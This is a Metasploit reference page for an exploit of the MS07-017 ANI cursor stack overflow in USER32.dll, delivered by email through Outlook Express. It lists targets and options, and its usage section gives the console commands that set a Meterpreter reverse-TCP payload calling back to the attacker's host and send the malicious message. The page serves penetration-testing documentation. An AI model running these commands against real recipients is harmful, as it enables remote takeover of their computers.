Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) | Metasploit Exploit Database (DB)

Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)

This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.

Search Other Modules


Exploit Rank

  • Great

Exploit Authors

  • hdm < hdm [at] metasploit.com >
  • skape < mmiller [at] hick.org >

Vulnerability References


Exploit Targets

  • 0 - Automatic (default)
  • 1 - Windows XP SP2 user32.dll 5.1.2600.2622
  • 2 - Windows XP SP2 userenv.dll English
  • 3 - Windows XP SP2 userenv.dll French
  • 4 - Windows XP SP0/SP1 netui2.dll English
  • 5 - Windows 2000 SP0-SP4 netui2.dll English
  • 6 - Windows Vista user32.dll 6.0.6000.16386
  • 7 - Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
  • 8 - Windows XP SP2 user32.dll (5.1.2600.2180) English
  • 9 - Windows XP SP2 userenv.dll Portuguese (Brazil)
  • 10 - Windows XP SP1a userenv.dll English
  • 11 - Windows XP SP1a shell32.dll English

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/email/ms07_017_ani_loadimage_chunksize
msf exploit(ms07_017_ani_loadimage_chunksize) > show payloads
msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST [MY IP ADDRESS]
msf exploit(ms07_017_ani_loadimage_chunksize) > set MAILTO [STRING]
msf exploit(ms07_017_ani_loadimage_chunksize) > set RHOST [TARGET IP]
msf exploit(ms07_017_ani_loadimage_chunksize) > set SUBJECT [STRING]
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit


Exploit Module Options

MAILFROM The FROM address of the e-mail (default: random@example.com)
MAILTO The TO address of the email
PASSWORD SMTP Password for sending email
RHOST The SMTP server to send through
RPORT The SMTP server port (e.g. 25, 465, 587, 2525) (default: 25)
SUBJECT Subject line of the email
USERNAME SMTP Username for sending email
VERBOSE Display verbose information
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE Specify the workspace for this module
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)